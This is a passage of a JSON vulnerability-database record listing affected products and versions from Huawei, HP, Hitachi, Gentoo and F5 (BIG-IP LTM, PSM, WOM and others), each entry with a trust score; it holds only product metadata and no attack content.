            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8080"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8060"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8030"
          },
          {
            "_id": null,
            "model": "antiddos 500-d v100r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "1550"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "1520"
          },
          {
            "_id": null,
            "model": "sitescope monitors 11.32ip1",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "sitescope monitors",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "sdn van controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "0109-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-10-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-10"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-02-04"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-05"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-04"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-06"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-03"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-03"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-02"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-01"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-06"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-02"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-01"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-12"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-11"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-10"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-09"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-08"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-07"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-06"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-04"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-03"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-01"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-07"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-06"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-05"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-04"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-03"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-02"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-51-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-51"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-08"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-08"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip pem hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf7",
            "scope": "eq",
